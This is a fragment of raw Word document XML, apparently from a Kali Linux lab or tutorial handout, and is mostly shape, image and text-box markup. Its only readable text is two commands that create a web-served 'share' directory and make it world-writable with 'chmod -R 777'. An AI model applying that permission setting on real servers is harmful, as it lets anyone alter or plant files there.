                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 854" o:spid="_x0000_s1220" style="position:absolute;left:49149;top:41635;width:563;height:2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yT+sYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNRUuM2Yj0D3qsUVBvj+wz&#10;CWbfhuzWxH76bqHgcZiZ3zDpcjCNuFLnassKJuMIBHFhdc2lgv3u8zkG4TyyxsYyKbiRg2X2+JBi&#10;om3PW7rmvhQBwi5BBZX3bSKlKyoy6Ma2JQ7e2XYGfZBdKXWHfYCbRr5E0as0WHNYqLClt4qKS/5t&#10;FKzjdnXc2J++bD5O68PXYf6+m3ulRk/DagHC0+Dv4f/2RiuIZ1P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0yT+sYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 855" o:spid="_x0000_s1221" style="position:absolute;left:4572;top:43053;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A2YcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3ppNC0qM2QTRFj22KtjeHtln&#10;Epp9G7Jbk/rruwXB4zAz3zBZMZpWXKh3jWUFz1EMgri0uuFKwfHw9pSAcB5ZY2uZFPySgyKfPGSY&#10;ajvwB132vhIBwi5FBbX3XSqlK2sy6CLbEQfvbHuDPsi+krrHIcBNK1/ieC4NNhwWauxoXVP5vf8x&#10;CrZJt/rc2etQta9f29P7abE5LLxSj9NxtQThafT38K290wqS2Qz+z4QjI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AA2YcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 856" o:spid="_x0000_s1222" style="position:absolute;left:49149;top:76809;width:563;height:2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KoFsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvGmqoNRqFNl10aN/FtTbo3m2&#10;xealNFlb/fRGEPY4zMxvmNmiNaW4Ue0KywoG/QgEcWp1wZmC38NPLwbhPLLG0jIpuJODxfyjM8NE&#10;24Z3dNv7TAQIuwQV5N5XiZQuzcmg69uKOHgXWxv0QdaZ1DU2AW5KOYyisTRYcFjIsaKvnNLr/s8o&#10;WMfV8rSxjyYrV+f1cXucfB8mXqnuZ7ucgvDU+v/wu73RCuLR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0qgWxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 857" o:spid="_x0000_s1223" style="position:absolute;left:4572;top:78226;width:563;height:2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4NjcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNWNBW2M2Yj0D3qsUVBvj+wz&#10;CWbfhuzWxH76bqHgcZiZ3zDpcjCNuFLnassKJuMIBHFhdc2lgv3u8zkG4TyyxsYyKbiRg2X2+JBi&#10;om3PW7rmvhQBwi5BBZX3bSKlKyoy6Ma2JQ7e2XYGfZBdKXWHfYCbRr5E0UwarDksVNjSW0XFJf82&#10;CtZxuzpu7E9fNh+n9eHrMH/fzb1So6dhtQDhafD38H97oxXE01f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54NjcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:color w:val="FF0000"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 9488" o:spid="_x0000_s1224" type="#_x0000_t75" style="position:absolute;left:4540;top:9691;width:44609;height:334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AnH37CAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxET8uKwjAU3QvzD+EOuBFNR1RqNcog+NiJ&#10;nVm4vDZ32jLNTWlirX69WQguD+e9XHemEi01rrSs4GsUgSDOrC45V/D7sx3GIJxH1lhZJgV3crBe&#10;ffSWmGh74xO1qc9FCGGXoILC+zqR0mUFGXQjWxMH7s82Bn2ATS51g7cQbio5jqKZNFhyaCiwpk1B&#10;2X96NQrGO4mnfYWDeirn7eNydsYdY6X6n933AoSnzr/FL/dBK5hP4jA3vAlPQK6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AJx9+wgAAAN0AAAAPAAAAAAAAAAAAAAAAAJ8C&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAjgMAAAAA&#10;">
                  <v:imagedata r:id="rId54" o:title=""/>
                </v:shape>
                <v:shape id="Picture 9489" o:spid="_x0000_s1225" type="#_x0000_t75" style="position:absolute;left:4540;top:44965;width:44609;height:334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dNWPIAAAA3QAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO9C/8PyCr1I3VhENHWVGih4&#10;CIWaqtdH9jUJzb5Ns2sS/fXdguBxmJlvmNVmMLXoqHWVZQXTSQSCOLe64kLBV/b+vADhPLLG2jIp&#10;uJCDzfphtMJY254/qdv7QgQIuxgVlN43sZQuL8mgm9iGOHjftjXog2wLqVvsA9zU8iWK5tJgxWGh&#10;xIaSkvKf/dko2OXj8eljO03SX9n7g0yv28MxU+rpcXh7BeFp8Pfwrb3TCpazxRL+34QnINd/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DHTVjyAAAAN0AAAAPAAAAAAAAAAAA&#10;AAAAAJ8CAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABAD3AAAAlAMAAAAA&#10;">
                  <v:imagedata r:id="rId55" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="2848" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/www/html/share </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -R 777 /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/www/html/share </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1419" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-331317</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5433060" cy="2103120"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9522" name="Group 9522"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5433060" cy="2103120"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5433060" cy="2103120"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="11591" name="Shape 11591"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3268980" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3268980" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3268980" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3268980"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1592" name="Shape 11592"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="175260"/>
                            <a:ext cx="3447288" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3447288" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3447288" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3447288"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1593" name="Shape 11593"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="350520"/>
                            <a:ext cx="4666488" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4666488" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4666488" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4666488"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1594" name="Shape 11594"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="525780"/>
                            <a:ext cx="5058156" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5058156" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5058156" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5058156"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1595" name="Shape 11595"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="701040"/>
                            <a:ext cx="2474976" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2474976" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2474976" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2474976"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1596" name="Shape 11596"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="876300"/>
                            <a:ext cx="1770888" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1770888" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1770888" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1770888"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1597" name="Shape 11597"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1051560"/>
                            <a:ext cx="42672" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="42672" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="42672" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42672"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1598" name="Shape 11598"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1226821"/>
                            <a:ext cx="1790700" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1790700" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1790700" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1790700"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1599" name="Shape 11599"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1402080"/>
                            <a:ext cx="5433060" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="5433060" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5433060" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5433060"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1600" name="Shape 11600"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1577340"/>
                            <a:ext cx="3576828" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3576828" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3576828" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3576828"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1601" name="Shape 11601"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1752600"/>
                            <a:ext cx="3281172" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="3281172" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3281172" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3281172"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1602" name="Shape 11602"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1927860"/>
                            <a:ext cx="2612136" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2612136" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2612136" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2612136"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g:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="25535AE9" id="Group 9522" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:-26.1pt;width:427.8pt;height:165.6pt;z-index:-251655168" coordsize="54330,21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&#10;5QcAAAAA&#10;">
                <v:shape id="Shape 11591" o:spid="_x0000_s1027" style="position:absolute;width:32689;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="326898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vWmsUA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+F/wPywje6iZ9iMZsRISiBw/VevE2Zsck&#10;mJ0N2W2S9td3BaG3+fiek64GU4uOWldZVhBPIxDEudUVFwpOXx/PcxDOI2usLZOCH3KwykZPKSba&#10;9nyg7ugLEULYJaig9L5JpHR5SQbd1DbEgbva1qAPsC2kbrEP4aaWL1E0kwYrDg0lNrQpKb8dv42C&#10;/PdCTUH+8/U667vtebM7xPs3pSbjYb0E4Wnw/+KHe6fD/Ph9EcP9nXCDz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m9aaxQAAAN4AAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m,l3268980,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,3268980,175260"/>
                </v:shape>
                <v:shape id="Shape 11592" o:spid="_x0000_s1028" style="position:absolute;top:1752;width:34472;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3447288,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Vl7cQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWrCQBC+C77DMoI33ShY2+gqUhULudjUBxiy0yQ1&#10;O5vurpq+fVcQvM3H9zvLdWcacSXna8sKJuMEBHFhdc2lgtPXfvQKwgdkjY1lUvBHHtarfm+JqbY3&#10;/qRrHkoRQ9inqKAKoU2l9EVFBv3YtsSR+7bOYIjQlVI7vMVw08hpkrxIgzXHhgpbeq+oOOcXoyDf&#10;7l1B2ex4yJLDz7aZ7yj73Sk1HHSbBYhAXXiKH+4PHedPZm9TuL8Tb5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0VZe3EAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l3447288,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,3447288,175260"/>
                </v:shape>
